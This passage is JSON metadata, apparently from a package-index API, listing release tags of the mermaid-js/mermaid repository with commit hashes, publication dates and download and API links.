04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.